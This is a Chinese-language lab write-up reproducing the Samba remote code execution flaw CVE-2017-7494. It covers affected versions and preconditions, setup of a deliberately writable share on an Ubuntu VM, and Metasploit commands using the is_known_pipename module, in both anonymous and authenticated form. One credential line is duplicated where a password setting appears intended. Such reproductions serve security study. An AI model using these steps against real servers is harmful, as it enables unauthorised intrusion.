Samba远程代码执行漏洞(CVE-2017-7494)
一、漏洞描述
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
二、影响版本
Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。
三、利用条件
1、服务开启了文件/打印机共享端口445。
2、共享文件具有写入权限。
3、攻击者需要知道共享目录的物理路径。
四、环境搭建
使用镜像: ubuntu-14.04.1-server-amd64.iso
在搭建的过程中,会询问我们安装什么软件,一定要记住勾选samba服务。
就是上面这个位置,一定要注意,空格是选择,tab是选择continue,然后回车是继续。然后耐心等待安装就行,安装教程附一篇:VMware下Ubuntu Server 14.04安装教程(最详细) – 简书
五、漏洞复现
1、匿名
(1)查看Samba版本
使用命令查看Samba
的版本:
/usr/sbin/samba -V
版本号4.1.6
,属于漏洞版本范围,所以存在漏洞。
(2)创建并配置共享目录
首先在/home
目录下创建一个共享目录,并赋予最高权限。
(3)修改Samba的配置文件
在/etc/samba/smb.conf
下修改:
[myshare]
comment=smb share test
browseable=yes #可读
writeable=yes #可写
path=/home/share #设置共享目录
public = yes #允许匿名登录
使vim中显示左侧的行数:
:set number
之后我们重启smb服务:
service smbd start #开启
service smbd stop #关闭
service smbd restart #重启
(4)漏洞测试
开启Msf,寻找并利用exp。
search CVE-2017-7494
设置exp:
msf5 exploit(linux/samba/is_known_pipename) > set rhosts 192.168.203.138
rhosts => 192.168.203.138
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER /home/share
SMB_FOLDER => /home/share
msf5 exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME /home/share
SMB_SHARE_NAME => /home/share
最终攻击成功!
2、非匿名
修改配置文件:
vim /etc/samba/smb.conf
不允许匿名登录:设置public=no
在全局设置中,配置一个安全用户:
之后添加一个账户:
useradd user
smbpasswd -a user #设置用户user的smb密码
service smbd restart
这次我们在设置exp的时候就要加上账号和密码了
set smbuser user
set smbuser user
漏洞攻击成功。
参考文章:https://www.cnblogs.com/Hi-blog/p/7782356.html